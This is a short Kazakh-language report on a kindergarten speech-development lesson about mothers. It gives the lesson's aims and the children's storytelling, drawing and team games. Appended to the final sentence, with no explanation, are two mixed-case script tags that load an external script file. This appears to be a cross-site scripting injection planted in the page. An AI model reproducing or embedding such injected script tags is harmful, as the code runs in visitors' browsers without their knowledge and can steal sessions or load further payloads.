Педагогикалық шеберлік онкүндігі Білім беру саласы : Қатынас Арнайы түзету оқу қызметі: Тіл дамыту №10 "Күншуақ" тобы Логопед: А.Ж.Оспанова Тақырыбы: "Барлық жырымды анама арнаймын" Мақсаты: 4К–Моделінің дағдыларын қалыптастыру.Әр адам үшін басты тұлға-ана туралы түсінік беру, сюжеттік суреттер бойынша әңгіме құрастыра білуді дамыту. Сөздік қорын молайту.Балаларды байланыстырып сөйлеуге, сұрақтарға толық жауап беруге дағдыландыру, ойын арқылы қызығушылықтарын арттыру. Аналарға құрметпен қарауға тәрбиелеу. Әр бала өздерінің сүйікті аналары туралы сипаттап, тақтадағы сурет бойынша аналарының өздерін қалай еркелететінін айтты. Аналарын қуантатын сыйлықтың суретін салды. Тақырыпқа байланысты мақал-мәтелдерді жалғастыру барысында, балалардың сөздік қорының дамығаны байқалды. Командаға бөлініп ойын ойнады, ойын кезінде балалардың ұжыммен бірігіп жұмыс жасау қабілеттерінің артқаны көрінді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>